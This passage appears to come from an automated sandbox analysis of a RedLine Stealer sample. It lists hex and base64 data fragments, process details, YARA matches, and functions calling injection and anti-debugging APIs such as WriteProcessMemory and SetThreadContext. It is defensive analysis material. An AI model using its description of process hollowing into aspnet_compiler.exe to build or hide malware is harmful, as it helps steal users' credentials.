SP/HrmCdrja1R7/TzgHH+nS7bqVJcDvcTj/llLMtuhfFdQ8B29Nd2Oqihi6ryQzV6Co3z2ldZ08oiM9eHA9S/XZFEy0f+ArXuQD3KnXzb87NGNi9FsDybPqeZ41pM494LrIKuA8IosJQh92IP2X4JsM/MPw7wyqO4u0MOxhuYphlOMId5CrgBMNzHNgqYLGNYrONWvYgUvLbct7vgXbbBPgZ1jJcyDDEcBnDjQyHEOdyO1g/wFBGjHAPIhqcHdZ
2022-11-03 11:44:40 UTC	143	IN	Data Raw: 61 57 52 6c 63 67 42 54 65 58 4e 30 5a 57 30 75 55 32 56 6a 64 58 4a 70 64 48 6b 75 51 33 4a 35 63 48 52 76 5a 33 4a 68 63 47 68 35 41 45 6c 44 63 6e 6c 77 64 47 39 55 63 6d 46 75 63 32 5a 76 63 6d 30 41 55 33 6c 74 62 57 56 30 63 6d 6c 6a 51 57 78 6e 62 33 4a 70 64 47 68 74 41 46 4e 31 63 48 42 79 5a 58 4e 7a 56 57 35 74 59 57 35 68 5a 32 56 6b 51 32 39 6b 5a 56 4e 6c 59 33 56 79 61 58 52 35 51 58 52 30 63 6d 6c 69 64 58 52 6c 41 46 4e 35 63 33 52 6c 62 53 35 54 5a 57 4e 31 63 6d 6c 30 65 51 42 54 61 57 35 6e 62 47 55 41 55 33 52 79 61 57 35 6e 41 45 56 75 59 32 39 6b 61 57 35 6e 41 46 4e 35 63 33 52 6c 62 53 35 55 5a 58 68 30 41 45 31 76 62 6d 6c 30 62 33 49 41 55 33 6c 7a 64 47 56 74 4c 6c 52 6f 63 6d 56 68 5a 47 6c 75 5a 77 42 55 65 58 42 6c 41 46 56 Data Ascii: aWRlcgBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5AElDcnlwdG9UcmFuc2Zvcm0AU3ltbWV0cmljQWxnb3JpdGhtAFN1cHByZXNzVW5tYW5hZ2VkQ29kZVNlY3VyaXR5QXR0cmlidXRlAFN5c3RlbS5TZWN1cml0eQBTaW5nbGUAU3RyaW5nAEVuY29kaW5nAFN5c3RlbS5UZXh0AE1vbml0b3IAU3lzdGVtLlRocmVhZGluZwBUeXBlAFV
2022-11-03 11:44:40 UTC	151	IN	Data Raw: 41 41 41 58 41 51 41 53 51 32 39 77 65 58 4a 70 5a 32 68 30 49 4d 4b 70 49 43 41 79 4d 44 49 79 41 41 41 45 49 41 45 42 41 69 6b 42 41 43 51 33 5a 44 64 68 4e 54 4d 33 4e 53 30 32 4e 44 4d 31 4c 54 51 35 4d 54 6b 74 59 6a 4e 6c 4e 69 31 69 4f 44 52 6c 4d 7a 41 7a 4e 32 52 6c 4e 7a 55 41 41 41 77 42 41 41 63 78 4c 6a 41 75 4d 43 34 77 41 41 42 4a 41 51 41 61 4c 6b 35 46 56 45 5a 79 59 57 31 6c 64 32 39 79 61 79 78 57 5a 58 4a 7a 61 57 39 75 50 58 59 30 4c 6a 55 42 41 46 51 4f 46 45 5a 79 59 57 31 6c 64 32 39 79 61 30 52 70 63 33 42 73 59 58 6c 4f 59 57 31 6c 45 69 35 4f 52 56 51 67 52 6e 4a 68 62 57 56 33 62 33 4a 72 49 44 51 75 4e 51 59 48 42 41 67 43 41 67 49 31 42 79 30 49 44 68 45 67 45 52 77 49 43 42 30 49 43 41 67 49 43 41 49 49 43 41 59 64 42 51 67 Data Ascii: AAAXAQASQ29weXJpZ2h0IMKpICAyMDIyAAAEIAEBAikBACQ3ZDdhNTM3NS02NDM1LTQ5MTktYjNlNi1iODRlMzAzN2RlNzUAAAwBAAcxLjAuMC4wAABJAQAaLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUBAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lEi5ORVQgRnJhbWV3b3JrIDQuNQYHBAgCAgI1By0IDhEgERwICB0ICAgICAIICAYdBQg

Target ID:	0
Start time:	12:44:36
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\StZAEFSb2j.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\StZAEFSb2j.exe
Imagebase:	0x5d0000
File size:	43520 bytes
MD5 hash:	C71616E2B7CEDF9FC8E2CA6F6929ABDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Target ID:	1
Start time:	12:44:40
Start date:	03/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0xc10000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Target ID:	2
Start time:	12:44:40
Start date:	03/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	30.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	14.7%
Total number of Nodes:	95
Total number of Limit Nodes:	4

Executed Functions

Function 00E40448 Relevance: 5.6, Strings: 4, Instructions: 610COMMON

Download Yara Rule

Strings

{=, xrefs: 00E40D6B, 00E40D70
, xrefs: 00E404C1
xIl, xrefs: 00E40D83
=U%k, xrefs: 00E40BA0

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID: $=U%k$xIl${=
API String ID: 0-945469655
Opcode ID: cc2c42c5ccee55ae30c621ea2943a92e629639e899feb08ed752661a307d45ec
Instruction ID: d14c3513a5d9804a9ab2056fa6b7c51ced19f4ad5145fcb4811ff27e8ca2393c
Opcode Fuzzy Hash: cc2c42c5ccee55ae30c621ea2943a92e629639e899feb08ed752661a307d45ec
Instruction Fuzzy Hash: 1D52F670A01259CFEB64DF65C984A8EFBB2FF89314F15C1A9D609AB211D7309D81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00E40439 Relevance: 5.2, Strings: 4, Instructions: 240COMMON

Download Yara Rule

Strings

{=, xrefs: 00E40D6B, 00E40D70
, xrefs: 00E404C1
xIl, xrefs: 00E40D83
=U%k, xrefs: 00E40BA0

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID: $=U%k$xIl${=
API String ID: 0-945469655
Opcode ID: b34d413d47f35a3a42cd3dc4c57bacae7af097dda8d2dc1e488c23c524dea669
Instruction ID: 71079766dc036fa346e0363f558e632a6a48adf2ba1b4e1bda8df2fc1ae739b9
Opcode Fuzzy Hash: b34d413d47f35a3a42cd3dc4c57bacae7af097dda8d2dc1e488c23c524dea669
Instruction Fuzzy Hash: 0FB1B474E052288FDB64DF66D850B9ABBB2EF89304F10C0EAD549AB354DB305E85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00E46310 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00E4639E

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: be71cfbace30add83776ae889a276ba0cd580ef6f11ae746b56e1a7e1442eff2
Instruction ID: 5a94e373f18cfff29f735a0a5b3c7f5d47e40b9db05bdfda23eaffda2eee1c92
Opcode Fuzzy Hash: be71cfbace30add83776ae889a276ba0cd580ef6f11ae746b56e1a7e1442eff2
Instruction Fuzzy Hash: 063197B4D052589FCF10CFAAD884ADEFBB1BB99314F10942AE915B7200C775A946CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00E48108 Relevance: 1.4, Instructions: 1426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f879d62472bfc2ae945099c7d6013aa376246a05e0cbdd55529cad66bb238845
Instruction ID: fd35fcf95bb7340117ebe8409b47ec56c2fa35e80c341b5cb704f16a431183cc
Opcode Fuzzy Hash: f879d62472bfc2ae945099c7d6013aa376246a05e0cbdd55529cad66bb238845
Instruction Fuzzy Hash: 4DB2BD70E012288FDB65EF28D994BEDBBF1AB49304F1091EAD50CA7291DB349E84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00E47321 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b552e0a91a8ca1becfff5c02f49c89b7f6e189fed01d7fd98cbbf35bf0f4ce9a
Instruction ID: b4953e2e608582622b9cbb30e7c46fc35899644007a502b04a6a65ee321460e5
Opcode Fuzzy Hash: b552e0a91a8ca1becfff5c02f49c89b7f6e189fed01d7fd98cbbf35bf0f4ce9a
Instruction Fuzzy Hash: 7A52A174A04229CFDB64CF69D984B99BBB1FF49304F1091E9E949AB361DB309E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E45129 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fdd820b6cdc9daa022f6fae032dce868d0a6e633af634d56645bf1ac2f86540
Instruction ID: 4876ef922398ad1feb3efe7bb497ad1f530104856ab03e0a396ec7ee3dd77c18
Opcode Fuzzy Hash: 5fdd820b6cdc9daa022f6fae032dce868d0a6e633af634d56645bf1ac2f86540
Instruction Fuzzy Hash: 6C42B674A016188FDB64CF69D984B99B7F2FF49310F1091E9E909AB361DB309D85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E419D0 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fcd3b4ae8482f9b058bc5e26d771bde1a6794dcefdc30ab5cd8511a30760275
Instruction ID: 272f070eb248d4624b811c50f5a165289aa5e325558655e50cc1f46f961090e1
Opcode Fuzzy Hash: 1fcd3b4ae8482f9b058bc5e26d771bde1a6794dcefdc30ab5cd8511a30760275
Instruction Fuzzy Hash: DA429E74E01219CFDB64CFA9D984BADBBB2FF48310F1081A9E909A7355D731AA81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E446A8 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecfd82e85363a804abf645328143fbca3587570fd38980f80d3c4c1c00c886e
Instruction ID: ffd320a6a293effd22fce97208d57dc9de77938711d10afaefc68ccc60fb1c9c
Opcode Fuzzy Hash: eecfd82e85363a804abf645328143fbca3587570fd38980f80d3c4c1c00c886e
Instruction Fuzzy Hash: 7BA107B4E04218CBEB24DFA9E9447EDBBF2EB89304F14A06AE509B7391DB345941DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00E43F60 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f113658a966432918b69829c83c98b7f0ad279c148145b0db9a43edb4450f3a8
Instruction ID: 7848e38503628f5b4b1fb15080af10cbe6e893b47f5e8f2ef293c6d2259bddb1
Opcode Fuzzy Hash: f113658a966432918b69829c83c98b7f0ad279c148145b0db9a43edb4450f3a8
Instruction Fuzzy Hash: 4D81E874E04208CFCB14CFA9D994ADDBBB2FF89304F20906AE905AB365DB345941CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00E419C1 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 249398b1a7879068db610fbfff12f7a5171932d150331f0a98e12962e2da904b
Instruction ID: 101c546bb60ddc4144f8d58e81d9211894495010ee57c5916877bf7fdfcff68e
Opcode Fuzzy Hash: 249398b1a7879068db610fbfff12f7a5171932d150331f0a98e12962e2da904b
Instruction Fuzzy Hash: 79619274E01218CFDB18CF9AD994B9DBBB2FF88310F1481A9D909A7364D7359981CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00E499F5 Relevance: 1.7, APIs: 1, Instructions: 239
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00E49BDF

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 96f0dcc3d903b94fd673fd5672a7e4d519ada063c7972bb060f7a5ed05541604
Instruction ID: bb3c1eb45a2d322378b1ab88e27341e874442f93f79a1ed50142b0982454aa1b
Opcode Fuzzy Hash: 96f0dcc3d903b94fd673fd5672a7e4d519ada063c7972bb060f7a5ed05541604
Instruction Fuzzy Hash: 4281F1B5C0426D8FCF24CFA5D880BDEBBB1AB59304F0590AAE549B7210D7709E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E49A00 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00E49BDF

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1022424bc4071090777cea90c2732fcd2624cbf5864b622b595738f84d99aafb
Instruction ID: 6e53be230315da213df8d0614d329b4d1c7bad07d329353cdf1c7dcaa07d3588
Opcode Fuzzy Hash: 1022424bc4071090777cea90c2732fcd2624cbf5864b622b595738f84d99aafb
Instruction Fuzzy Hash: 2781E0B5C0426D8FCF24CFA5D880BEEBBB1AB59304F0590AAE549B7211D7709E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E4A0AC Relevance: 1.6, APIs: 1, Instructions: 113
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00E4A17E

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ff1fcbcedddc0927de1b1104ce03bc9db9f152e6f05735b01e9d9e35c13c5f72
Instruction ID: e75cf6594f6792110518980addca2c69524c970ce23851f181b3085795a6f6e3
Opcode Fuzzy Hash: ff1fcbcedddc0927de1b1104ce03bc9db9f152e6f05735b01e9d9e35c13c5f72
Instruction Fuzzy Hash: 214187B5D012589FCF10CFA9D984ADEBBF1BB49314F24902AE818B7210D334AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00E4A0B0 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00E4A17E

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 68fe6f042fe8d1bc9e2da579d28def09489b47d212bb64931686215cac9c6c18
Instruction ID: e87f1b6ce4092c1b09fbc8c72be36c6ac56013709b15b568e484cd15787c32cd
Opcode Fuzzy Hash: 68fe6f042fe8d1bc9e2da579d28def09489b47d212bb64931686215cac9c6c18
Instruction Fuzzy Hash: A84176B5D012589FCF10CFA9D984ADEFBF1BB59314F24902AE818B7310D374AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00E466D8 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(?,?), ref: 00E46779

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 0031fd5248b42c03439a118d9f1457bd36ec2e09b289beac5d2a66a9b9ca2204
Instruction ID: 0f4949601e186c00c1ab2626b9052de015e0e7da828a45d2d83f4c1203257559
Opcode Fuzzy Hash: 0031fd5248b42c03439a118d9f1457bd36ec2e09b289beac5d2a66a9b9ca2204
Instruction Fuzzy Hash: F931EDB4D052189FCF14CFA9E888AEEFBB1AF5A314F14902AE405B7210C734A906CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00E49E88 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00E49F3D

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6af3c834c054c0494d41ebb604d01c55299caa8fbb5883f0cd13c7204852278d
Instruction ID: 114ac60bb2b6665d57717bd1bcd3bdb1fd1d55ec2afdfac5e638249362544bdb
Opcode Fuzzy Hash: 6af3c834c054c0494d41ebb604d01c55299caa8fbb5883f0cd13c7204852278d
Instruction Fuzzy Hash: 6E4179B5D04258DFCF10CFAAD884ADEFBB1BB59324F14A02AE824B7250D335A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00E49E90 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00E49F3D

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3cc7bbb513279dddd8e7deeff9c84724674691c80315f8a146249946f982921b
Instruction ID: 8b27e32a343acd2df95258e1722a8841e48243e435469927989c4d9375677732
Opcode Fuzzy Hash: 3cc7bbb513279dddd8e7deeff9c84724674691c80315f8a146249946f982921b
Instruction Fuzzy Hash: DC3176B9D042589FCF10CFAAD884AEEFBB1BB19310F14A02AE814B7210D335A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00E49FA0 Relevance: 1.6, APIs: 1, Instructions: 100
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00E4A04D

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2edb06c38451b8e75f1489b303b750fc369c54bee09eb4e5dc8fa3c5bef661a8
Instruction ID: 0c06d4ed0bb3e160334c044a65591ce7a1645622bbc63c19d07396e4e79c6fe5
Opcode Fuzzy Hash: 2edb06c38451b8e75f1489b303b750fc369c54bee09eb4e5dc8fa3c5bef661a8
Instruction Fuzzy Hash: E83168B9D04258DFCF10CFA9E884ADEBBB5BB59324F14A02AE814B7310D335A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00E49FA8 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00E4A04D

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6041d0647d8b47ec6c3fe622786fcbf706b32a02d963f00b6fc29c818bd6383f
Instruction ID: 8e3d67541d3918a0c36ea2840411e4e0d12ba160f45f7728cda0498c4f36c3f5
Opcode Fuzzy Hash: 6041d0647d8b47ec6c3fe622786fcbf706b32a02d963f00b6fc29c818bd6383f
Instruction Fuzzy Hash: 083176B9D042589FCF10CFA9E884ADEFBB5BB59320F14A02AE814B7310D335A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00E49D79 Relevance: 1.6, APIs: 1, Instructions: 89
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,?), ref: 00E49E2A

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 33ef1174c1e7e67845f72f485fff686f735273c058a2a313345952c71a1c1926
Instruction ID: 03aaa22347f77e9131fc351f986eab88e56c3020f9e03476d36d98c553a669f0
Opcode Fuzzy Hash: 33ef1174c1e7e67845f72f485fff686f735273c058a2a313345952c71a1c1926
Instruction Fuzzy Hash: E531ABB5D012589FCB10CFAAE884ADEFBF1BB49314F24902AE414B7200D375A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00E49D80 Relevance: 1.6, APIs: 1, Instructions: 88
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,?), ref: 00E49E2A

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 4e0288bf696ae8d0221ce68ae3f87e723d613125cca30706664d057834a02352
Instruction ID: 5fd115c430bb89f9196b506c5f2f2da1d3870071aa694b422ed687d945c45ef9
Opcode Fuzzy Hash: 4e0288bf696ae8d0221ce68ae3f87e723d613125cca30706664d057834a02352
Instruction Fuzzy Hash: 8F319AB5D012589FCB10CFAAE984ADEFBF1BB49314F24902AE414B7310D378AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00E4432F Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00E4648E

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 27ab278b8882e82c6738be0de78aa165a01dcfcb3b399894b02ef5002ed86abe
Instruction ID: 2fafa11340e685e1bf60be8784a3d69a399421ae5c71d579b9405307533c9476
Opcode Fuzzy Hash: 27ab278b8882e82c6738be0de78aa165a01dcfcb3b399894b02ef5002ed86abe
Instruction Fuzzy Hash: 9031F0B5D082589FCF10CFA9E884ADEFBB0BB5A314F14905AE855B7351D334A805CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00E466E0 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(?,?), ref: 00E46779

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 42d483ae651fee439e551b71725faf2131dcbbcfe470b9a3e2c41056881e8264
Instruction ID: b43f3dac3a8ca7264b521cbe9471f138b19c745cffe8a7c3b52b27c85dc4d107
Opcode Fuzzy Hash: 42d483ae651fee439e551b71725faf2131dcbbcfe470b9a3e2c41056881e8264
Instruction Fuzzy Hash: 7931AAB4D052189FDF14CFA9E884AEEFBB1AF49314F14942AE405B7210D734A946CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E46308 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00E4639E

Memory Dump Source

Source File: 00000000.00000002.317711943.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_StZAEFSb2j.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 733b7dcf55ce01dc361549e49cf40198ebdc9f0a5d7456e32bf5a218fb31bd54
Instruction ID: 684e7ef1044b9b04f72ecda738a9ff7d289480befd3f02ee359d800800dd2e46
Opcode Fuzzy Hash: 733b7dcf55ce01dc361549e49cf40198ebdc9f0a5d7456e32bf5a218fb31bd54
Instruction Fuzzy Hash: 7431B8B4D052589FCF10CFAAD884ADEFBB1FB99314F14942AE805B7200D735A946CFA5

Uniqueness

